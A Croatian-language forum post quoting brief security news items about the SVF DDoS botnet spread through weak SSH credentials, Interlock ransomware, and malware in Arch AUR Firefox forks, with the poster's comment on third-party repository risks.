[tomek@vz]

Par loših vijesti nažalost:

Citiraj:

AhnLab Security Intelligence Center (ASEC) has been actively tracking cyber threats exploiting vulnerable Linux servers through strategically deployed honeypots, with SSH services using weak credentials emerging as a prime target for distributed denial-of-service (DDoS) and cryptocurrency mining actors.

In a recent incident, ASEC observed threat actors successfully infiltrating a honeypot Linux server via brute-force attacks on SSH, subsequently deploying the SVF Botnet malware.

This Python-based DDoS bot, attributed to the “SVF Team,” leverages Discord as its command-and-control (C&C) infrastructure and incorporates proxy servers to enhance attack evasion.

The installation process involves creating a virtual environment, installing dependencies like discord.py, requests, aiohttp, and lxml, followed by downloading the main.py script from a termbin URL and executing it with a server group parameter, such as “-s 5,” to facilitate grouped command execution.

> gbhackers

Citiraj:

CISA Warns of Interlock Ransomware With Double Extortion Tactics Attacking Windows and Linux Systems

> cybersecuritynews

Citiraj:

Arch Linux users told to purge Firefox forks after AUR malware scare

> TheRegister

U ovom trenu bih rekao da je AUR koncept ionako možda malo problematičan što se sigurnosti tiče (kao i bilo koji drugi 3rd party repo bilo koje distre) ali ako me sjećanje ne vara - nije prvi puta.